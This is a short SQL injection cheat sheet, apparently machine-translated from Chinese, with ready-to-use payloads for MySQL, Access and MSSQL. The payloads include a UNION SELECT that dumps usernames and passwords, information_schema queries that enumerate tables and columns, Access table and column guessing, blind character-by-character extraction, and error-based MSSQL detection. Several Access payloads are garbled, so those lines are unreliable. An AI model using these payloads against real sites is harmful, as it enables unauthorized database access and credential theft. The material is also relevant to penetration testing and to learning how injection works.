MySQL Chapter
1. Built-in functions and variables
@@datadir,version(),database(),user(),load_file(),outfile()
2. Using Concat (), Group_concat (), CONCAT_WS () stitching query Results
Instance:
xxx.php?id=1 and 1=2 union select 1, group_concat(username,0x3a,password),3 from user
3. Querying the table segments and fields using the built-in database
Check the table segment:
xxx.php?id=1 and 1=2 union select 1,2,table_name from (select* from information_schema.tables where table_schema=数据库名的hex order by table_schema limit 0,1)t
Check fields:
xxx.php?id=1 and 1=2 union select 1,2,column_name from (select* from information_schema.columns where table_name=表名的hex and table_schema=数据库名hex值 order by 1 limit 1,1)t
Here can be combined with the next concat splicing function
xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20) from (select * from information_schema.columns where table_name=表名的hex and table_schema=数据库名hex值 order by 1 limit 0,n)t limit 1– [n表示第n条数据]
Access article
Guess table name
*.asp?id=1 and exists (select * from admin)
Guess Column Name
*.asp?id=1 and exists (select password from admin)
Order by Query
*.asp?id=1 order by 3
Union query
*.asp?id=1 union select 1,password,3 from admin
Cases where the Union is not supported
Determine the length of the content first
*.asp?idfrom>5
And then one guess
*.asp?idfrom admin)>97
For example, to determine that the value of ASC (Mid (user,1,1)) is 97, you can determine that the first character of the user is a
OK then continue guessing from the second position
*.asp?idfrom admin)>97
And so on
MSSQL article
MSSQL injection based on error:
Judging whether it's MSSQL
'and exists (select * from sysobjects) --
If returned to normal, it is MSSQL, otherwise when the sysobjects does not exist, will be an error.
Guess table name:
'and exists(select * from admin)--
If it exists, it will return to the normal page, otherwise the error is not present.
SQL Manual Injection Tips